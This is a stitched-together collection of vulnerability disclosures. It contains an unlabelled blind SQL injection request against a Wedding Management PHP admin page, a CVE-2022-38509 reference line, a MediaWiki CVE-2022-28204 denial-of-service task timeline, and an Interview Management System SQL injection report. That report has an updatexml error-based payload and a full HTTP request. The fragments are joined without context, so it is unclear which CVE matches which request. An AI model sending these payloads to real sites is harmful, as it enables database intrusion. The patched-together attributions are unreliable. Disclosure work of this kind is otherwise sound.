GET /Wedding\-Management\-PHP/admin/budget.php?booking\_id\=31%20and%20length(database())%20\=9&user\_id\=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close

When length (database ()) = 8 

When length (database ()) = 9

CVE-2022-38509: bug_report/SQLi-1.md at main · ptanly/bug_report

A denial-of-service issue was discovered in MediaWiki 1.37.x before 1.37.2. Rendering of w/index.php?title=Special%3AWhatLinksHere&target=Property%3AP31&namespace=1&invert=1 can take more than thirty seconds. There is a DDoS risk.

Risk Rating

Low

Author Affiliation

WMF Technology Dept

*   Task Graph
*   Mentions

**Event Timeline**

Restricted Application added a subscriber: Aklapper.

Restricted Application added a project: wdwb-tech.

Ladsgroup added a parent task: Restricted Task.

sbassett triaged this task as Low priority.

sbassett changed Author Affiliation from N/A to WMF Technology Dept.

sbassett changed Risk Rating from N/A to Low.

Reedy renamed this task from Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector to CVE-2022-: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector.

Reedy renamed this task from CVE-2022-: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector to CVE-2022-28204: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector.

CVE-2022-28204: Whatlinkshere of heavily used properties in wikidata can be easily utilized as a DDoS vector

Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /interview/delete.php?action=deletecand&id=.

**Interview Management System v1.0 by janobe has SQL injection**

BUG\_Author: yuanqiu

Login account: janobe@janobe.com/janobe (Super Admin account)

vendors: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /interview/delete.php?action=deletecand&id=

Vulnerability location: /interview/delete.php?action=deletecand&id=, id

dbname =sourcecodester\_interviewdb

\[+\] Payload: /interview/delete.php?action=deletecand&id=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) // Leak place ---> id

GET /interview/delete.php?action\=deletecand&id\=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

Tag

#php